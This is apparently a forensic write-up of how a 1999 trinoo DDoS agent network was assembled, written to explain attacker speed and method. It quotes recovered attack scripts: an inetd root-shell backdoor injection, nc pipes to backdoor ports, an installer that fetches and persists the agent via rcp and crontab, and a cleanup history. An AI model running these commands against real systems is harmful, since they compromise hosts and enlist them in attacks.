Check out the new USENIX Web site.

Anatomy of Setting up a DoS Network

In August of 1999, a trinoo network of 2,200 systems was used against the University of Minnessota and several other sites worldwide. The group suspected of waging these attacks used a compromised software development system at a corporation in Canada.

In the directory were found tools for scanning entire Class B network blocks, several remote buffer overrun exploits, and denial of service programs. There were log files that are assumed to be lists of potential victim systems. Two such files (and line -- meaning host -- counts) are:


   41660 com.domains
   10549 216
   52209 total

The intruders were scanning the Internet for systems that have a known vulnerability, then compromising them using the following script, passing it the IP address of each "vulnerable" system:


./r -6 -k $1 "echo 'ingreslock stream tcp nowait root /bin/sh sh -i' \
  >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob"
./r -6  $1 "echo 'ingreslock stream tcp nowait root /bin/sh sh -i' \
  >>/tmp/bob; /usr/sbin/inetd -s /tmp/bob"
echo Sleeping 2 seconds...
sleep 2
telnet $1 1524

The resulting systems that were successfully penetrated (as identified by filtering the output for signs of a successful "telnet" connection to the backdoor shell) was then used to generate another script. One such script was still in the cache, and contained a list of 100 such compromised systems (fully qualified domain names added at the end of the line for clarity):


./trin.sh | nc 128.172.XXX.XXX 1524 &	XXXXXX.egr.vcu.edu
./trin.sh | nc 128.172.XXX.XXX 1524 &	XXXXXX.egr.vcu.edu
./trin.sh | nc 128.172.XXX.XXX 1524 &	XXXXXX.egr.vcu.edu
./trin.sh | nc 128.172.XXX.XX 1524 &	XXXXXXXX.mas.vcu.edu
./trin.sh | nc 128.3.X.XX 1524 &	XXXXXXXX.lbl.gov
./trin.sh | nc 128.3.X.XX 1524 &	XXXXXXX.lbl.gov
./trin.sh | nc 128.3.X.XXX 1524 &	XXXXXX.lbl.gov
./trin.sh | nc 128.173.XX.XX 1524 &	XXXXXX.cns.vt.edu
./trin.sh | nc 128.173.XX.XX 1524 &	XXXXXXX.cns.vt.edu
./trin.sh | nc 128.173.XX.XXX 1524 &	XXXXX.cns.vt.edu
./trin.sh | nc 128.173.XX.XXX 1524 &	XXXXX.cns.vt.edu
./trin.sh | nc 128.173.XX.XX 1524 &	XXXXXX.emporium.vt.edu
./trin.sh | nc 128.173.XX.XX 1524 &	XXXXXX.fw.vt.edu
./trin.sh | nc 128.173.XX.XX 1524 &	XXXXXX.ee.vt.edu
./trin.sh | nc 128.173.XX.XX 1524 &	XXXXXX.ee.vt.edu
./trin.sh | nc 128.173.XX.XXX 1524 &	XXXXX.ise.vt.edu
./trin.sh | nc 128.173.XX.XXX 1524 &	XXXX.ise.vt.edu
./trin.sh | nc 128.173.XX.XX 1524 &	XXXXXX.ece.vt.edu
./trin.sh | nc 128.173.XX.XX 1524 &	XXX.cimss.vt.edu
./trin.sh | nc 128.173.XX.XX 1524 &	XXXXXXX.ise.vt.edu
./trin.sh | nc 128.173.XX.XXX 1524 &	XXXXX.ise.vt.edu
./trin.sh | nc 128.173.XX.XXX 1524 &	XXXXXXX.ise.vt.edu
./trin.sh | nc 128.173.XX.XXX 1524 &	XXXXXXXX.ise.vt.edu
./trin.sh | nc 128.173.XX.XXX 1524 &	XXXXXXXX.ise.vt.edu
./trin.sh | nc 128.173.XX.XXX 1524 &	XXXXXXXX.ise.vt.edu
./trin.sh | nc 128.173.XX.XXX 1524 &	XXXXXX.ise.vt.edu
./trin.sh | nc 128.173.XXX.XXX 1524 &	XXXXXXX.geog.vt.edu
./trin.sh | nc 128.173.XXX.XXX 1524 &	XXXXXXX.geog.vt.edu
./trin.sh | nc 128.173.XXX.XXX 1524 &	XXXXXXX.geog.vt.edu
./trin.sh | nc 128.173.XXX.XXX 1524 &	
./trin.sh | nc 128.173.XXX.XXX 1524 &	
./trin.sh | nc 128.173.XXX.XXX 1524 &	XXXXXXXX.esm.vt.edu
./trin.sh | nc 128.173.XXX.XXX 1524 &	XXXXXXX.geol.vt.edu
./trin.sh | nc 128.173.XXX.XXX 1524 &	XXXXX.geol.vt.edu
./trin.sh | nc 128.173.XXX.XXX 1524 &	XXXXX.me.vt.edu
./trin.sh | nc 128.173.XXX.XX 1524 &	XXXX.esm.vt.edu
./trin.sh | nc 128.173.XXX.XXX 1524 &	XXXXXX.mine.vt.edu
./trin.sh | nc 128.173.XXX.XX 1524 &	XXXXX.isis.vt.edu
./trin.sh | nc 128.173.XXX.XX 1524 &	XXXXXXX.isis.vt.edu
./trin.sh | nc 128.173.XXX.XX 1524 &	XXXXXXX.ento.vt.edu
./trin.sh | nc 128.173.XXX.XX 1524 &	XXXXX.ento.vt.edu
./trin.sh | nc 128.173.XXX.XX 1524 &	XXXXXXX.bse.vt.edu
./trin.sh | nc 128.173.XXX.XX 1524 &	XXXX.sv.vt.edu
./trin.sh | nc 128.174.XX.XXX 1524 &	XXXXX.math.uiuc.edu
./trin.sh | nc 128.174.XX.XXX 1524 &	XXXXXXXX.math.uiuc.edu
./trin.sh | nc 128.174.XX.XXX 1524 &	XXXXX.math.uiuc.edu
./trin.sh | nc 128.174.XX.XX 1524 &	XXXXXX.agecon.uiuc.edu
./trin.sh | nc 128.174.XX.XXX 1524 &	XXXXXXXXX.ps.uiuc.edu
./trin.sh | nc 128.174.XX.XX 1524 &	XXXXXXX.psych.uiuc.edu
./trin.sh | nc 128.174.XX.XX 1524 &	XXXXXXX.psych.uiuc.edu
./trin.sh | nc 128.174.XX.XX 1524 &	XXXXXXX.psych.uiuc.edu
./trin.sh | nc 128.174.XX.XX 1524 &	XXXXXXX.psych.uiuc.edu
./trin.sh | nc 128.174.XX.XX 1524 &	XXXXXXX.psych.uiuc.edu
./trin.sh | nc 128.174.XX.XX 1524 &	XXXXXXX.psych.uiuc.edu
./trin.sh | nc 128.174.XX.XX 1524 &	XXXXXXX.psych.uiuc.edu
./trin.sh | nc 128.174.XX.XX 1524 &	XXXXXXX.psych.uiuc.edu
./trin.sh | nc 128.174.XX.XX 1524 &	XXXXXXX.psych.uiuc.edu
./trin.sh | nc 128.174.XX.XX 1524 &	XXXXXXX.psych.uiuc.edu
./trin.sh | nc 128.174.XX.XX 1524 &	XXXXXXX.psych.uiuc.edu
./trin.sh | nc 128.174.XX.XX 1524 &	XXXXX.psych.uiuc.edu
./trin.sh | nc 128.174.XX.XX 1524 &	XXXXXXX.ehs.uiuc.edu
./trin.sh | nc 128.174.XX.XX 1524 &	
./trin.sh | nc 128.174.XX.XX 1524 &	XXXXXXX.geology.uiuc.edu
./trin.sh | nc 128.174.XX.XX 1524 &	XXXX.nres.uiuc.edu
./trin.sh | nc 128.174.XX.XXX 1524 &	XXXXXXXX.animal.uiuc.edu
./trin.sh | nc 128.174.XX.XXX 1524 &	XXXX.music.uiuc.edu
./trin.sh | nc 128.174.XXX.XX 1524 &	
./trin.sh | nc 128.174.XXX.XX 1524 &	XXXXXX.math.uiuc.edu
./trin.sh | nc 128.174.XXX.XXX 1524 &	XXXXXXXX.math.uiuc.edu
./trin.sh | nc 128.174.XXX.XX 1524 &	XXXXX.math.uiuc.edu
./trin.sh | nc 128.174.XXX.XXX 1524 &	XXXXXXXX.math.uiuc.edu
./trin.sh | nc 128.174.XXX.XXX 1524 &	XXXXX.math.uiuc.edu
./trin.sh | nc 128.174.XXX.XXX 1524 &	XXXXX.math.uiuc.edu
./trin.sh | nc 128.174.XXX.XXX 1524 &	XXXXX.math.uiuc.edu
./trin.sh | nc 128.174.XXX.XXX 1524 &	XXXXXX.math.uiuc.edu
./trin.sh | nc 128.174.XXX.XXX 1524 &	XXXXX.math.uiuc.edu
./trin.sh | nc 128.174.XXX.XX 1524 &	XXXXX.stat.uiuc.edu
./trin.sh | nc 128.174.XXX.XX 1524 &	XXXXX.stat.uiuc.edu
./trin.sh | nc 128.174.XXX.XX 1524 &	XXXX.stat.uiuc.edu
./trin.sh | nc 128.174.XXX.XX 1524 &	XXXXXXX.stat.uiuc.edu
./trin.sh | nc 128.174.XXX.XX 1524 &	XXXXXX.stat.uiuc.edu
./trin.sh | nc 128.174.XXX.XX 1524 &	XXXXX.stat.uiuc.edu
./trin.sh | nc 128.174.XXX.XX 1524 &	XXXXXXX.stat.uiuc.edu
./trin.sh | nc 128.174.XXX.XX 1524 &	XXXX.stat.uiuc.edu
./trin.sh | nc 128.174.XXX.XX 1524 &	XXXX.me.uiuc.edu
./trin.sh | nc 128.174.XXX.XXX 1524 &	XXXX.me.uiuc.edu
./trin.sh | nc 128.174.XXX.XX 1524 &	XXXXX.me.uiuc.edu
./trin.sh | nc 128.174.XXX.XX 1524 &	XXXXXXX.me.uiuc.edu
./trin.sh | nc 128.174.XXX.XX 1524 &	XXXXX.me.uiuc.edu
./trin.sh | nc 128.174.XXX.XX 1524 &	XXXXXX.me.uiuc.edu
./trin.sh | nc 128.174.XXX.XX 1524 &	XXXXXX.me.uiuc.edu
./trin.sh | nc 128.174.XXX.XX 1524 &	XXXX.me.uiuc.edu
./trin.sh | nc 128.174.XXX.XX 1524 &	XXXX.me.uiuc.edu
./trin.sh | nc 128.174.XXX.XXX 1524 &	XXXXX.me.uiuc.edu
./trin.sh | nc 128.174.XXX.XXX 1524 &	XXXX.me.uiuc.edu
./trin.sh | nc 128.174.XXX.XXX 1524 &	XXXXXX.me.uiuc.edu
./trin.sh | nc 128.174.XXX.XXX 1524 &	XXXXXXXX.me.uiuc.edu
./trin.sh | nc 128.174.XXX.XXX 1524 &	XXXXX.me.uiuc.edu
./trin.sh | nc 128.174.XXX.XXX 1524 &	XXXX.me.uiuc.edu
./trin.sh | nc 128.174.XXX.XXX 1524 &	XXXXXXX.me.uiuc.edu

The script "trin.sh" being piped to the backdoor port on each compromised system does the actual installation of a trinoo DDoS agent on each system:


echo "rcp 192.168.0.1:leaf /usr/sbin/rpc.listen"
echo "echo rcp is done moving binary"

echo "chmod +x /usr/sbin/rpc.listen"

echo "echo launching trinoo"
echo "/usr/sbin/rpc.listen"

echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron"
echo "crontab cron"
echo "echo launched"
echo "exit"

Found in December 1999 on a stacheldraht agent, identified with the "gag" scanner, was the following shell .history file (the semi-colon is required by some remote exploit shells):


#+0946131241
ps -u root -e | grep ttymon | awk '{print "kill -9 "$1}' > .tmp &&
chmod 755 ./.tmp && ./.tmp && rm -f .tmp ;
#+0946131241
rm -rf /usr/lib/libx ;
#+0946131241
mkdir /usr/lib/libx ;
#+0946131241
mkdir /usr/lib/libx/... ;
#+0946131241
cd /usr/lib/libx/.../ ;
#+0946131241
rcp root@XXXXX.XXXXXXXX.lu.se:td ttymon ;
#+0946131244
nohup ./ttymon ;
#+0946131244
rm -rf ./ttymon ;

The numbers are Unix timestamps. Converting the first and last ones shows how long it took to root the system, set up a DDoS agent, and clean up:

% ctime 0946131241
Sat Dec 25  6:14:01 1999

% ctime 0946131244
Sat Dec 25  6:14:04 1999

Just over three seconds.

Assuming 3 to 6 seconds for each host, and pre-selection of the target systems, it would have taken somewhere around 2 - 4 hours to set up the network of 2,200 systems used against the University of Minnessota in August 1999. Reports from at least one site in the US, which recovered a syslog file showing rcp transfers, confirmed that thousands of systems can be set up in this manner in a matter of a few hours. (The preliminary scanning/sorting itself would presumably take days or weeks to accomplish, but would generate very little attention at most sites.)

[Next] | [Prev] | [Top]


Dave Dittrich <dittrich@cac.washington.edu>
Last modified: Sat Jul 22 01:02:29 PDT 2000